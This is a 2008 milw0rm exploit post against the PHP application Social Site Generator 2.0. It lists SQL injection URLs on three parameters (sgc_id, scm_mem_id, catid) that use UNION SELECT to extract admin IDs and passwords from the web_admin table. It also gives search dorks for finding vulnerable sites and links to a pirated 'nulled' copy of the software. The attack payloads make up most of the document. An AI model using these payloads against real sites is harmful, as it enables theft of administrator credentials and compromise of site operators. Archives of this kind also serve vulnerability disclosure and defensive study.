Social Site Generator 2.0 - 'sgc_id' SQL Injection





Platform:

PHP

Date:

2008-05-31


< -------------------\__________________/------------------- >

#
#
# Application Name        : Social Site Generator
#
# DeMo                        : www.ssgdemo.com
#
#Download                   : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type         : SQL InJeCtiOn
#
# Dork 1                       : display_blog.php
# Dork 2                       : social_my_profile_download
# Dork 3                       : social_forum_subcategories
#
# author                       : DeAr Ev!L
#
#
# Greatz                      : ALLAH
#                                : Genie & Roy5 & Mister-x
#                        
# Team                       : DeLtA MoRoCcAn tEaM
#
#Site Web                   : WwW.BHJA.NeT
#
< -------------------^_________________^------------------- >



< -- bug SQL start -- >

ADMIN :

www.path.com/path/display_blog.php?sgc_id=-4+union+select+1,admin_id+from+web_admin
www.path.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+admin_id,2,3,4+from+web_admin
www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,admin_id+from+web_admin

Password :

www.path.com/path/display_blog.php?sgc_id=-4+union+select+1,password+from+web_admin
www.path.com/path/social_my_profile_download.php?scm_mem_id=-1+union+select+password,2,3,4+from+web_admin
www.path.com/path/social_forum_subcategories.php?catid=-1+union+select+1,2,password+from+web_admin

< -- bug SQL End -- >

# milw0rm.com [2008-05-31]